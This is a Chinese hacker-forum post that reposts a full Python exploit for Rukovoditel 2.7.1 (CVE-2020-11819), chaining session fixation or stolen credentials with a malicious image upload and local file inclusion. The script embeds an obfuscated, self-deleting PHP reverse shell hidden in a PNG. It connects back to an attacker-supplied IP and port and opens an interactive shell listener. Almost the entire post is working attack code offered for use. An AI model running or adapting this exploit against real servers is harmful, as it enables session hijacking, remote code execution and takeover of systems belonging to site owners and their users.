跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
#!/usr/bin/python3
# Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated) 
# Exploit Author: @_danyx07
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: Rukovoditel < 2.7
# Tested on: Debian 9 Rukovoditel 2.6.1
# CVE : CVE-2020-11819
# Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile.
#   With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell.
#   Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code. 
#   Protip: remember to check if the registration module is enabled ;)

import sys
import requests
from bs4 import BeautifulSoup
import re
import base64
import argparse
import os
from shutil import copyfile
import datetime
import hashlib
import socket
import threading
import time
import random
import uuid

__version__ = '1.0'

parser = argparse.ArgumentParser(description=
    "Post-authenticate RCE for rukovoditel, script version %s" % __version__,
                                     usage='\n  %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n  %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
         
parser.add_argument('-t', '--target', metavar='URL', type=str, required=True,
                    help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
     
parser.add_argument('-u', '--user', type=str,
                    help='Username for authentication')
     
parser.add_argument('-p', '--password', type=str,
                    help='Password for authentication')
     
parser.add_argument('-a', '--type', required=True,  type=str,
                    help='Use -a L  to generate the link and steal the session or use -a C  if you have access credentials to the web application')
     
parser.add_argument('--ip', metavar="IP_ATTACKER", required=True,  type=str,
        help='IP attacker for reverse shell!')
     
parser.add_argument('--port', metavar="PORT_ATTACKER", required=True,  type=str,
                    help='Port for reverse shell connection')
     
parser.add_argument('--proxy', metavar="PROXY",
                    help='Setup http proxy for debbugin http://127.0.0.1:8080')
     
args = parser.parse_args()
     
# Global variables 
s = requests.Session()
url = args.target
user = args.user
pwd = args.password
typeAttack = args.type
IP=args.ip
PORT=args.port
proxyDict = {"http" : args.proxy, "https" : args.proxy}
csrf_token=""
pht=None
flag_access=False
sid = uuid.uuid4().hex
     
def serverShell():
    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server_address = (IP,int(PORT))
    server.bind((server_address))
    server.listen(0)
    print("[+] Listening on %s:%s" % (IP,PORT))
    conn,addr = server.accept()
    print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1]))
    print("Type 'quit' for exit")
    server.settimeout(10)
    while True:
        cmd = input()
        if cmd == 'quit':
            print("[-] Closing connection with the shell")
            conn.close()
            server.close()
            break

        cmd = cmd + "\n"
        if len(str(cmd)) > 0:
            command = conn.send(cmd.encode('utf-8'))
            try:
                response = conn.recv(2048)
                print(response.decode('utf-8'))
            except server.timeout:
                print("Didn't receive data!")
            finally:
                server.close()
    conn.close()

def authByCookie():
    global flag_access
    global sid
    url_hijack = url+'index.php?sid='+sid
    url_in = url+"index.php?module=dashboard/"
    print("[+] Send this URL to the victim -> %s" % url_hijack)
    while True:
        if flag_access == True:
            break

def checkAccess(stop):
    global flag_access
    time.sleep(3)
    while True:
        if typeAttack == 'L':
            s.cookies.clear()
            s.cookies.set('sid',sid)
        url_login = url+'index.php?module=users/account'
        r = s.get(url_login, proxies=proxyDict)
        response = r.text
        if response.find('account_form') != -1:
            print("[+] Access granted!")
            soup = BeautifulSoup(response, 'lxml')
            csrf_token = soup.find('input')['value']
            flag_access=True
        else:
            print("[-] Waiting for access")
        if stop():
            break
        time.sleep(3)
    return 0
    
def makeAuth():
    url_login = url+'index.php?module=users/login&action=login'
    r = s.get(url_login, proxies=proxyDict)
    html = r.text
    soup = BeautifulSoup(html, 'lxml')
    csrf_token = soup.find('input')['value']
    print("[+] Getting CSRF Token %s" % csrf_token )
    auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token}
    print("[+] Trying to authenticate with username %s" % user)
    r = s.post(url_login, data=auth, proxies=proxyDict)
    response = r.text
    if response.find("login_form") != -1:
        print("[-] Authentication failed... No match for Username and/or Password!")
        return -1

def createEvilFile():
    rv = """
        /*<?php /**/
         unlink(__FILE__);
          @error_reporting(0);
          @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
          $dis=@ini_get('disable_functions');
          if(!empty($dis)){
            $dis=preg_replace('/[, ]+/', ',', $dis);
            $dis=explode(',', $dis);
            $dis=array_map('trim', $dis);
          }else{
            $dis=array();
          }
          
        $ipaddr='"""+IP+"""';
        $port="""+PORT+""";

        if(!function_exists('SsMEEaClAOR')){
          function SsMEEaClAOR($c){
            global $dis;
            
          if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
            $c=$c." 2>&1\\n";
          }
          $RhoVbBR='is_callable';
          $vaVrJ='in_array';
          
          if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){
            $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
            $o=NULL;
            while(!feof($pipes[1])){
              $o.=fread($pipes[1],1024);
            }
            @proc_close($handle);
          }else
          if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){
            $o=shell_exec($c);
          }else
          if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){
            $o=array();
            exec($c,$o);
            $o=join(chr(10),$o).chr(10);
          }else
          if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){
            $fp=popen($c,'r');
            $o=NULL;
            if(is_resource($fp)){
              while(!feof($fp)){
                $o.=fread($fp,1024);
              }
            }
            @pclose($fp);
          }else
          if($RhoVbBR('system')and!$vaVrJ('system',$dis)){
            ob_start();
            system($c);
            $o=ob_get_contents();
            ob_end_clean();
          }else
          if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){
            ob_start();
            passthru($c);
            $o=ob_get_contents();
            ob_end_clean();
          }else
          {
            $o=0;
          }
        
            return $o;
          }
        }
        $nofuncs='no exec functions';
        if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
          $s=@fsockopen("tcp://$ipaddr",$port);
          while($c=fread($s,2048)){
            $out = '';
            if(substr($c,0,3) == 'cd '){
              chdir(substr($c,3,-1));
            } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
              break;
            }else{
              $out=SsMEEaClAOR(substr($c,0,-1));
              if($out===false){
                fwrite($s,$nofuncs);
                break;
              }
            }
            fwrite($s,$out);
          }
          fclose($s);
        }else{
          $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
          @socket_connect($s,$ipaddr,$port);
          @socket_write($s,"socket_create");
          while($c=@socket_read($s,2048)){
            $out = '';
            if(substr($c,0,3) == 'cd '){
              chdir(substr($c,3,-1));
            } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
              break;
            }else{
              $out=SsMEEaClAOR(substr($c,0,-1));
              if($out===false){
                @socket_write($s,$nofuncs);
                break;
              }
            }
            @socket_write($s,$out,strlen($out));
          }
          @socket_close($s);
        }
    """
    encoded_bytes = rv.encode('ascii')
    b64_bytes = base64.b64encode(encoded_bytes);
    payload = b64_bytes.decode('ascii')
    createImage()
    copyfile("./tux.png","/tmp/evil-tux.png")
    evilF = open('/tmp/evil-tux.png','a+')
    evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>")
    evilF.close()
    print("[+] Evil file created!")

def searchFile(etime):
    cdate = etime
    for i in range(3600,52200,900):
        h1 = hashlib.sha1()
        img1 = str(cdate+i)+"_evil-tux.png"
        h1.update(img1.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h1.hexdigest())
        if r.status_code == 200:
            print(r.text)
            return h1.hexdigest()
        h2 = hashlib.sha1()
        img2 = str(cdate-i)+"_evil-tux.png"
        h2.update(img2.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h2.hexdigest())
        if r.status_code == 200:
            #print(r.text)
            return h2.hexdigest()
        i+1800
    return ""


def uploadFile():
    global pht
    print("[+] Trying to upload evil file!...")
    form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':'english.php'}
    files = {'fields[10]':open('/tmp/evil-tux.png','rb')}
    url_upload = url+'index.php?module=users/account&action=update'
    r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
    date = r.headers['Date']
    etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
    #reg = re.findall(r"([a-fA-F\d]{40})",r.text)
    reg = None
    if not reg:
        print("[-] The file name was not found in the response :(")
        fileUp = searchFile(etime)
    else:
        fileUp = reg[0]
    print("[+] Looking for the file name uploaded...")
    r = s.get(url+"/uploads/users/"+fileUp)
    if r.status_code!=200:
        print("[-] File name couldn't be found!")
        exit()
    pht="../../uploads/users/"+fileUp
    print("[+] String for path traversal is %s" % pht)

def updateProfile(oplang="english.php"):
    if oplang == "english.php":
        print("[+] Updating profile with language %s " % oplang)
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        return 0
    else:
        print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        serverShell()

def createImage():
    if os.path.exists("tux.png"):
        return
    imgb64 = "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"
    f = open("tux.png","wb")
    f.write(base64.b64decode(imgb64))	
    f.close()

def main():
    s.cookies.clear()
    stop_threads = False
    check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, ))
    check_thread.start()
    if typeAttack == "C":
        if makeAuth() == -1:
            stop_threads = True
            check_thread.join()
            print("[-] Exiting...")
            exit(0)
    elif typeAttack == "L":
        authByCookie()
    else:
        "[!] You must specify the type of attack with the -a option"
        exit()
    createEvilFile()
    uploadFile()
    updateProfile(pht)
    stop_threads = True
    check_thread.join()
    print("[+] Starting clean up...")
    updateProfile()
    os.remove("/tmp/evil-tux.png")
    print("[+] Exiting...")

if __name__ == '__main__':
    main()
    s.cookies.clear()
    """try:
        main()
        s.cookies.clear()
    except Exception as e:
       print("[\033[91m!\033[0m] Error: %s" % e)"""

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。